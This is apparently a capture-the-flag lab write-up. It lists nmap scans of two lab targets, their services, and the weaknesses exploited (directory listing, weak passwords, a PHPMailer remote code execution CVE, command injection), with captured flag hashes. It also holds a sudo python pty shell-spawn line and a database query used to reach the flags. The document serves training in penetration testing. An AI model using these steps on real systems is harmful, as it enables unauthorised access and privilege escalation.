- Exposed Services
- Critical Vulnerabilities
- Exploitation
Target 1
$ nmap -sV --version-all 192.168.1.110
Target 2
$ nmap -sV -O 192.168.1.115
ELK Server
$ nmap -sV --version-all 192.168.1.100
Capstone
$ nmap -sV --version-all 192.168.1.105
Kali
$ nmap -sV --version-all 192.168.1.90
NAT Switch
$ nmap -sV --version-all 192.168.1.1
Target 1
PORT | STATE | SERVICE | VERSION |
---|---|---|---|
22/tcp | open | ssh | OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) |
80/tcp | open | http | Apache httpd 2.4.10 (Debian) |
Target 2
PORT | STATE | SERVICE | VERSION |
---|---|---|---|
22/tcp | open | ssh | OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) |
80/tcp | open | http | Apache httpd 2.4.10 (Debian) |
-
Exposure of Information through Directory Listing (CWE-548) -- Severity: Low
-
Weak Password Requirements (CWE-521)
- Improper Access Control (CWE-284)
- Improper Privilege Management (CWE-269)
- Remote Code Execution (CVE-2016-10033)
- Command Injection (CWE-77)
flag1.txt
: b9bbcb33e11b80be759c4e844862482d- Exploit Used: CWE-548: Exposure of Information through Directory Listing
$ nano /var/www/html/service.html
flag2.txt
: fc3fd58dcdad9ab23faca6e9a36e581c- Exploit Used: CWE-521: Weak Password Requirements
$ cat /var/www/flag2.txt
flag3.txt
: afc01ab56b50591e7dccf93122770cd2- Exploit Used: CWE-284: Improper Access Control
$ mysql> SELECT * FROM wp_posts;
flag4.txt
: 715dea6c055b9fe3337544932f2941ce- Exploit Used: _CWE-269: Improper Privilege Management
$ sudo python -c 'import pty;pty.spawn("bin/bash")'
flag1.txt
: a2c1f66d2b8051bd3a5874b5b6e43e21- Exploit Used: Remote Code Execution
- URL: 192.168.1.115/vendor/PATH
flag2.txt
: 6a8ed560f0b5358ecf844108048eb337- Exploit Used: Command Injection
$ cat /var/www/flag2.txt
flag3.txt
: a0f568aa9de277887f37730d71520d9b- Exploit Used: Command Injection
- URL: 192.168.1.115/wordpress/wp-content/uploads/2018/11/flag3.png